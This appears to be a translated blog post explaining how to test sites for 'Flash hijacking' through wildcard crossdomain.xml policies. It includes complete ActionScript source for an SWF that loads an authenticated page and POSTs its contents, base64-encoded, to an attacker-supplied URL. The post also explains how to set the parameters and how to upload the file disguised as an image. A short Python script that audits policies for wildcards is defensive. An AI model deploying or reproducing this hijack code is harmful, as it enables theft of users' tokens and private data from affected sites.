Flash is the standard for interactive vector graphics and Web animation launched by Macromedia, which was later acquired by Adobe. People who make Flash animations are called flashers.
How can you detect whether a site has a Flash hijacking problem?
iis7 website monitoring
It can detect hijacked websites, pollution, and Flash hijacking.
Flash hijacking
When hunting for SRC vulnerabilities, if you find an interface or page whose response contains user information or a token that uniquely identifies the user, visit www.**.com/crossdomain.xml:
<cross-domain-policy>
<allow-access-from domain="*.qq.com" />
<allow-access-from domain="*.gtimg.com" />
</cross-domain-policy>
If the situation above exists, go to **.com and find a place where you can upload an image; that is enough to hijack the user's privileges.
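The policy check described above, as an added example that is not part of the original post: a Python audit of a crossdomain.xml body that flags wildcard allow-access-from entries, since every host they match is trusted to read authenticated responses. The name audit_policy and the severity labels are assumptions made for this example; the sample policy is the one quoted above.

```python
import xml.etree.ElementTree as ET

# Policy as quoted in the post above.
SAMPLE_POLICY = """<cross-domain-policy>
<allow-access-from domain="*.qq.com" />
<allow-access-from domain="*.gtimg.com" />
</cross-domain-policy>"""


def audit_policy(xml_text):
    """Return (domain, severity, reason) findings for a crossdomain.xml body.

    audit_policy and the severity labels are names chosen for this example.
    """
    # A policy file has no reason to declare entities; refuse rather than expand them.
    if "<!ENTITY" in xml_text.upper():
        raise ValueError("policy declares entities; refusing to parse")
    root = ET.fromstring(xml_text)
    findings = []
    for node in root.iter("allow-access-from"):
        domain = (node.get("domain") or "").strip()
        if domain == "*":
            findings.append((domain, "high", "any origin may read responses"))
        elif "*" in domain:
            findings.append((domain, "medium",
                             "every matching host is trusted, including any "
                             "that serves user-uploaded files"))
        # secure="false" lets content loaded over HTTP read HTTPS responses.
        if (node.get("secure") or "true").lower() == "false":
            findings.append((domain, "medium", 'secure="false" allows HTTP origins'))
    return findings


if __name__ == "__main__":
    for domain, severity, reason in audit_policy(SAMPLE_POLICY):
        print(f"[{severity}] {domain}: {reason}")
```

An empty result only means the policy has no wildcard or secure="false" entries; exact hosts that accept user uploads still need review.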
Hijack source:
package {
import flash.display.Sprite;
import flash.events.Event;
import flash.net.*;
import flash.utils.ByteArray;
import flash.text.TextField;
public class hijack extends Sprite {
private static const _encodeChars:Vector.<int> = _initEncoreChar();
public function hijack()
{
var params:Object=root.loaderInfo.parameters;
var jpg:URLRequest = new URLRequest(params.jpg);
jpg.method = URLRequestMethod.GET;
sendToURL(jpg);
var request:URLRequest = new URLRequest(params.get);
request.method = URLRequestMethod.GET;
var loader:URLLoader=new URLLoader();
loader.addEventListener(Event.COMPLETE,completeHandler);
function completeHandler(event:Event):void{
var data:String=(loader.data);
var postURLrequest:URLRequest = new URLRequest(params.post);
postURLrequest.method = URLRequestMethod.POST;
var postdata:Object = new Array();
postdata[0]=encode(data);
postURLrequest.data = postdata[0];
sendToURL(postURLrequest);
}
loader.load(request);
}
public static function encode(data:String):String {
var bytes:ByteArray = new ByteArray();
bytes.writeUTFBytes(data);
return encodeByteArray(bytes);
}
public static function encodeByteArray(data:ByteArray):String {
var out:ByteArray = new ByteArray();
//Presetting the length keep the memory smaller and optimize speed since there is no "grow" needed
out.length = (2 + data.length - ((data.length + 2) % 3)) * 4 / 3; //Preset length //1.6 to 1.5 ms
var i:int = 0;
var r:int = data.length % 3;
var len:int = data.length - r;
var c:uint; //read (3) character AND write (4) characters
var outPos:int = 0;
while(i < len) {
//Read 3 Characters (8bit * 3 = 24 bits)
c = data[int(i++)] << 16 | data[int(i++)] << 8 | data[int(i++)];
out[int(outPos++)] = _encodeChars[int(c >>> 18)];
out[int(outPos++)] = _encodeChars[int(c >>> 12 & 0x3f)];
out[int(outPos++)] = _encodeChars[int(c >>> 6 & 0x3f)];
out[int(outPos++)] = _encodeChars[int(c & 0x3f)];
}
//Need two "=" padding
if(r == 1) {
//Read one char, write two chars, write padding
c = data[int(i)];
out[int(outPos++)] = _encodeChars[int(c >>> 2)];
out[int(outPos++)] = _encodeChars[int((c & 0x03) << 4)];
out[int(outPos++)] = 61;
out[int(outPos++)] = 61;
}
//Need one "=" padding
else if(r == 2) {
c = data[int(i++)] << 8 | data[int(i)];
out[int(outPos++)] = _encodeChars[int(c >>> 10)];
out[int(outPos++)] = _encodeChars[int(c >>> 4 & 0x3f)];
out[int(outPos++)] = _encodeChars[int((c & 0x0f) << 2)];
out[int(outPos++)] = 61;
}
return out.readUTFBytes(out.length);
}
private static function _initEncoreChar():Vector.<int> {
var encodeChars:Vector.<int> = new Vector.<int>(64, true);
// We could push the number directly
// But I think it's nice to see the characters (with no overhead on encode / decode)
var chars:String = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/";
for (var i:int = 0; i < 64; i++) {
encodeChars[i] = chars.charCodeAt(i);
}
return encodeChars;
}
}
}
Parameters:
jpg: the image domain (requested first so that crossdomain.xml is loaded ahead of time; otherwise the hijacked interface loads slowly and the hijack fails)
get: the hijacked interface or page
post: the page that receives the hijacked data, which is transmitted as base64
What is Flash? How do you detect a Flash hijacking problem?
Origin www.cnblogs.com/goodcola/p/11527038.html